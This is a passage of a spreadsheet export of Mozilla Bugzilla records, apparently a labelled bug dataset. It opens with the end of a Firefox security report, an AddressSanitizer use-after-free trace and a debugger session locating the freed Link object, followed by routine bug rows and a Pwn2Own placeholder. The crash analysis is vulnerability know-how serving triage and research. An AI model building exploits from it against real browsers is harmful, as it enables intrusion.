    #14 0x7f21bb8cea89 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:309
    #15 0x7f21bb8e6523 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/proxy/Proxy.cpp:399
    #16 0x7f21bb8e8cf2 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/proxy/Proxy.cpp:691
    #17 0x7f21bbb4fa2e in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #18 0x7f21bbb4fa2e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:468
    #19 0x7f21bbb3ed68 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:531
    #20 0x7f21bbb3ed68 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2831
    #21 0x7f21bbb2019e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:426
    #22 0x7f21bbb4fc6f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:498
    #23 0x7f21bbb501f1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:544
    #24 0x7f21bb69385a in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:2864
    #25 0x7f21b2f72fa3 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1237
    #26 0x7f21b16a9ff1 in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f21b16a9046 in SharedStub (/home/caonguyen/Fuzzing/firefox/version/firefox/libxul.so+0x17b7046)
0x611000411268 is located 168 bytes inside of 200-byte region [0x6110004111c0,0x611000411288)
freed by thread T0 (Web Content) here:
    #0 0x474f01 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f21b1565858 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2675
    #2 0x7f21b156547e in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2849
    #3 0x7f21b156b2e1 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3632
    #4 0x7f21b156edcf in nsCycleCollector_collectSlice(js::SliceBudget&amp;, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:4157
    #5 0x7f21b430da4a in nsJSContext::RunCycleCollectorSlice() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSEnvironment.cpp:1550
    #6 0x7f21b169e9d5 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsTimerImpl.cpp:524
    #7 0x7f21b1678805 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #8 0x7f21b1684b7b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:991
    #9 0x7f21b16fe90a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #10 0x7f21b240033e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:98
    #11 0x7f21b237795c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #12 0x7f21b237795c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #13 0x7f21b237795c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:206
    #14 0x7f21b7977237 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #15 0x7f21b99777c2 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:802
    #16 0x7f21b237795c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #17 0x7f21b237795c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #18 0x7f21b237795c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:206
    #19 0x7f21b9976ead in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:637
    #20 0x48dca0 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #21 0x7f21aeec870f in __libc_start_main (/usr/lib/libc.so.6+0x2070f)
previously allocated by thread T0 (Web Content) here:
    #0 0x475101 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48e2bd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f21b638cc5d in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f21b638cc5d in NS_NewHTMLAnchorElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/HTMLAnchorElement.cpp:22
    #4 0x7f21b659db51 in CreateHTMLElement /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/nsHTMLContentSink.cpp:292
    #5 0x7f21b659db51 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/html/nsHTMLContentSink.cpp:273
    #6 0x7f21b433b6b0 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsNameSpaceManager.cpp:147
    #7 0x7f21b4223468 in nsDocument::CreateElem(nsAString_internal const&amp;, nsIAtom*, int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsDocument.cpp:8733
    #8 0x7f21b7ab810c in nsEditor::CreateHTMLContent(nsIAtom*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/editor/libeditor/nsEditor.cpp:4578
    #9 0x7f21b7aed7e4 in nsHTMLEditor::CreateAnonymousElement(nsAString_internal const&amp;, nsIDOMNode*, nsAString_internal const&amp;, bool, nsIDOMElement**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/editor/libeditor/nsHTMLAnonymousUtils.cpp:152
    #10 0x7f21b7afd771 in nsHTMLEditor::ShowInlineTableEditingUI(nsIDOMElement*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/editor/libeditor/nsHTMLInlineTableEditor.cpp:71
    #11 0x7f21b7af5183 in nsHTMLEditor::CheckSelectionStateForAnonymousButtons(nsISelection*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/editor/libeditor/nsHTMLAnonymousUtils.cpp:401
    #12 0x7f21b7bf70d8 in ResizerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /builds/slave/m-cen-l64-asan-000000000000000/build/src/editor/libeditor/nsHTMLObjectResizer.cpp:105
    #13 0x7f21b8559fd4 in mozilla::dom::Selection::NotifySelectionListeners() /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsSelection.cpp:6031
    #14 0x7f21b855c36f in NotifySelectionListeners /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsSelection.cpp:2278
    #15 0x7f21b855c36f in EndBatchChanges /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsSelection.cpp:2267
    #16 0x7f21b855c36f in EndBatchChangesInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsSelection.cpp:6057
    #17 0x7f21b855c36f in mozilla::dom::SelectionBatcher::~SelectionBatcher() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/Selection.h:352
    #18 0x7f21b8572d98 in mozilla::dom::Selection::SelectAllChildren(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsSelection.cpp:5610
    #19 0x7f21b5255a1c in mozilla::dom::SelectionBinding::selectAllChildren(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:358
    #20 0x7f21b5ea4495 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2781
    #21 0x7f21bbb4f689 in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #22 0x7f21bbb4f689 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:480
    #23 0x7f21bbb3ed68 in CallFromStack /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:531
    #24 0x7f21bbb3ed68 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2831
    #25 0x7f21bbb2019e in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:426
    #26 0x7f21bbb4fc6f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:498
    #27 0x7f21bbb501f1 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:544
    #28 0x7f21bb695977 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:2926
    #29 0x7f21b59923ad in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259
    #30 0x7f21b6299429 in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:356
    #31 0x7f21b6299429 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/JSEventHandler.cpp:214
    #32 0x7f21b6264373 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:1100
    #33 0x7f21b62661c9 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:1271
    #34 0x7f21b6243a31 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:379
    #35 0x7f21b6247e4c in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:710
    #36 0x7f21b820fb8f in nsDocumentViewer::LoadComplete(nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDocumentViewer.cpp:995
    #37 0x7f21b8f459bd in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/src/docshell/base/nsDocShell.cpp:7516
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/dom/Link.h:89 GetElement
Shadow bytes around the buggy address:
  0x0c228007a1f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c228007a200: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c228007a210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c228007a220: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c228007a230: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c228007a240: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c228007a250: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c228007a260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c228007a270: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c228007a280: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c228007a290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb=1025==ABORTING
[Parent 779] WARNING: pipe error (51): Connection reset by peer: file /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 313
=== windbg with Firefox 46.0.1
(15c0.da8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0014c628 ebx=0de388f8 ecx=e5e5e5e5 edx=0de388f8 esi=e5e5e5e5 edi=0de38800
eip=562061fd esp=0014c60c ebp=0014c650 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
xul!mozilla::dom::Element::UpdateLinkState:
562061fd 8b5138          mov     edx,dword ptr [ecx+38h] ds:0023:e5e5e61d=????????
0:000&gt; ub @$ra L10
xul!nsIDocument::FlushPendingLinkUpdates+0x24 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsdocument.cpp @ 10187]:
5637ec9a 53              push    ebx
5637ec9b 8d4c2420        lea     ecx,[esp+20h]
5637ec9f e8d2c80e00      call    xul!PLDHashTable::Iterator::Iterator (5646b576)
5637eca4 8b44242c        mov     eax,dword ptr [esp+2Ch]
5637eca8 3b442430        cmp     eax,dword ptr [esp+30h]
5637ecac 742b            je      xul!nsIDocument::FlushPendingLinkUpdates+0x63 (5637ecd9)
5637ecae 8b442428        mov     eax,dword ptr [esp+28h]
5637ecb2 8b4804          mov     ecx,dword ptr [eax+4]
5637ecb5 8d442410        lea     eax,[esp+10h]
5637ecb9 50              push    eax
5637ecba 8b7108          mov     esi,dword ptr [ecx+8]
5637ecbd e81fe7f0ff      call    xul!mozilla::dom::Link::LinkState (5628d3e1)
5637ecc2 8bce            mov     ecx,esi
5637ecc4 ff7004          push    dword ptr [eax+4]
5637ecc7 ff30            push    dword ptr [eax]
5637ecc9 e82f75e8ff      call    xul!mozilla::dom::Element::UpdateLinkState (562061fd)
0:000&gt; dc poi(esp+28+c)
0e7fd440  0d22e00b 0dd7e78c f9d88ae6 0ddfe67c  ..".........|... &lt;=== mov eax,dword ptr [esp+28h] ; eax = 0e7fd440
0e7fd450  00000000 00000000 7381f9ba 0ddfe44c  ...........sL...
0e7fd460  91b437da 0deae0cc a9458082 0dd7e86c  .7........E.l...
0e7fd470  00000000 00000000 f756d0bf 0dd7e8dc  ..........V.....
0e7fd480  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0e7fd490  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0e7fd4a0  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0e7fd4b0  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0:000&gt; dc 0dd7e78c
0dd7e78c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................ &lt;=== mov ecx,dword ptr [eax+4] ; ecx = 0dd7e78c
0dd7e79c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
0dd7e7ac  e5e5e5e5 57f92bd0 57f67414 0e54c220  .....+.W.t.W .T.
0dd7e7bc  01900200 0d9903d0 0d6ba3a0 4002000c  ..........k....@
0dd7e7cc  0de916c0 00000000 0e3f40c0 0d6ba3a0  .........@?...k.
0dd7e7dc  0d6ba580 0000000c 0e02e700 00020000  ..k.............
0dd7e7ec  00000400 57f92e04 e5e5e500 57f9302c  .......W....,0.W
0dd7e7fc  57f93078 00000001 00010001 00000001  x0.W............
=== From source code
void
nsIDocument::FlushPendingLinkUpdates()
{
  ...
  for (auto iter = mLinksToUpdate.ConstIter(); !iter.Done(); iter.Next()) {
    Link* link = iter.Get()-&gt;GetKey();
    link-&gt;GetElement()-&gt;UpdateLinkState(link-&gt;LinkState());
  }
  ...
}</t>
        </is>
      </c>
      <c r="X4539" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4540">
      <c r="A4540" t="n">
        <v>1045248</v>
      </c>
      <c r="B4540" t="inlineStr">
        <is>
          <t>2014-07-28 14:36:59 -0700</t>
        </is>
      </c>
      <c r="C4540" t="inlineStr">
        <is>
          <t>Increase free space requirement for release-mozilla-beta-android_build jobs</t>
        </is>
      </c>
      <c r="D4540" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E4540" t="n">
        <v>1</v>
      </c>
      <c r="F4540" t="n">
        <v>1</v>
      </c>
      <c r="G4540" t="n">
        <v>5</v>
      </c>
      <c r="H4540" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4540" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4540" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4540" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4540" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4540" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4540" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4540" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4540" t="inlineStr"/>
      <c r="Q4540" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4540" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4540" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4540" t="n">
        <v>1</v>
      </c>
      <c r="U4540" t="n">
        <v>0</v>
      </c>
      <c r="V4540" t="n">
        <v>5</v>
      </c>
      <c r="W4540" t="inlineStr">
        <is>
          <t>Fennec 32.0b2 build failed in multilocale. Asked for 14GB, got 14.2G.</t>
        </is>
      </c>
      <c r="X4540" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4541">
      <c r="A4541" t="n">
        <v>1309395</v>
      </c>
      <c r="B4541" t="inlineStr">
        <is>
          <t>2016-10-11 15:45:35 -0700</t>
        </is>
      </c>
      <c r="C4541" t="inlineStr">
        <is>
          <t>Treeherder Terraform cleanup post Heroku migration</t>
        </is>
      </c>
      <c r="D4541" t="inlineStr">
        <is>
          <t>2016-11-30 06:28:12 -0800</t>
        </is>
      </c>
      <c r="E4541" t="n">
        <v>1</v>
      </c>
      <c r="F4541" t="n">
        <v>1</v>
      </c>
      <c r="G4541" t="n">
        <v>7</v>
      </c>
      <c r="H4541" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4541" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4541" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4541" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4541" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4541" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4541" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4541" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4541" t="inlineStr"/>
      <c r="Q4541" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4541" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4541" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4541" t="n">
        <v>1</v>
      </c>
      <c r="U4541" t="n">
        <v>0</v>
      </c>
      <c r="V4541" t="n">
        <v>18</v>
      </c>
      <c r="W4541" t="inlineStr">
        <is>
          <t>No rush, but at some point we can:
* Adjust the treeherder-{stage,prod} RDS instances to use the default security group/subnets
* Remove the unused treeherder admin EC2 instance
* Remove the now unused parameter groups {th-import, th-replication}
* Remove the treeherder-dbgrp subnet group
* Remove the treeherder-vpc VPC
* Fix the various boolean values that were listed as strings (eg `multi_az = "True"` 
* Make the tags consistent across prototype/stage/prod</t>
        </is>
      </c>
      <c r="X4541" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4542">
      <c r="A4542" t="n">
        <v>1180604</v>
      </c>
      <c r="B4542" t="inlineStr">
        <is>
          <t>2015-07-06 01:59:46 -0700</t>
        </is>
      </c>
      <c r="C4542" t="inlineStr">
        <is>
          <t>[MTBF] flame device hang after 6 hours running</t>
        </is>
      </c>
      <c r="D4542" t="inlineStr">
        <is>
          <t>2015-07-29 11:50:46 -0700</t>
        </is>
      </c>
      <c r="E4542" t="n">
        <v>1</v>
      </c>
      <c r="F4542" t="n">
        <v>1</v>
      </c>
      <c r="G4542" t="n">
        <v>6</v>
      </c>
      <c r="H4542" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4542" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4542" t="inlineStr">
        <is>
          <t>Stability</t>
        </is>
      </c>
      <c r="K4542" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4542" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4542" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4542" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4542" t="inlineStr"/>
      <c r="Q4542" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4542" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4542" t="inlineStr">
        <is>
          <t>FxOS-S4 (07Aug)</t>
        </is>
      </c>
      <c r="T4542" t="n">
        <v>1</v>
      </c>
      <c r="U4542" t="n">
        <v>0</v>
      </c>
      <c r="V4542" t="n">
        <v>8</v>
      </c>
      <c r="W4542" t="inlineStr">
        <is>
          <t>Build ID               20150702160209
Gaia Revision          722028715a56a03f327e2e70f2c32dcb6d819d4c
Gaia Date              2015-07-02 08:51:28
Gecko Revision         https://hg.mozilla.org/mozilla-central/rev/2f25351c5b05
Gecko Version          42.0a1
Device Name            flame
Firmware(Release)      4.4.2
Firmware(Incremental)  eng.cltbld.20150702.193535
Firmware Date          Thu Jul  2 19:35:46 EDT 2015
Bootloader             L1TC100118D0
STR: running over 60 hours MTBF test
Installation doc: https://developer.mozilla.org/en-US/Firefox_OS/Automated_testing/MTBF_tests
During tests, b2g gradually became slow and finally stuck.</t>
        </is>
      </c>
      <c r="X4542" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4543">
      <c r="A4543" t="n">
        <v>484320</v>
      </c>
      <c r="B4543" t="inlineStr">
        <is>
          <t>2009-03-19 19:24:50 -0700</t>
        </is>
      </c>
      <c r="C4543" t="inlineStr">
        <is>
          <t>XUL &lt;tree&gt; _moveToEdgeShift garbage-collection exploit (zdi-can-465)</t>
        </is>
      </c>
      <c r="D4543" t="inlineStr">
        <is>
          <t>2010-03-25 17:18:05 -0700</t>
        </is>
      </c>
      <c r="E4543" t="n">
        <v>1</v>
      </c>
      <c r="F4543" t="n">
        <v>1</v>
      </c>
      <c r="G4543" t="n">
        <v>3</v>
      </c>
      <c r="H4543" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4543" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4543" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K4543" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4543" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4543" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4543" t="inlineStr">
        <is>
          <t>[sg:critical] ZDI CanSecWest 2009 bug; exploit is post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4543" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4543" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4543" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4543" t="n">
        <v>1</v>
      </c>
      <c r="U4543" t="n">
        <v>0</v>
      </c>
      <c r="V4543" t="n">
        <v>39</v>
      </c>
      <c r="W4543" t="inlineStr">
        <is>
          <t>Placeholder for Pwn2Own bug found in Firefox at CanSecWest 2009</t>
        </is>
      </c>
      <c r="X4543" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4544">
      <c r="A4544" t="n">
        <v>993546</v>
      </c>
      <c r="B4544" t="inlineStr">
        <is>
          <t>2014-04-08 10:52:47 -0700</t>
        </is>
      </c>
      <c r="C4544" t="inlineStr">
        <is>
          <t>memory reporter wrappers for realloc can use-after-free</t>
        </is>
      </c>
      <c r="D4544" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:16 -0800</t>
        </is>
      </c>
      <c r="E4544" t="n">
        <v>1</v>
      </c>
      <c r="F4544" t="n">
        <v>1</v>
      </c>
      <c r="G4544" t="n">
        <v>3</v>
      </c>
      <c r="H4544" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4544" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4544" t="inlineStr">
        <is>
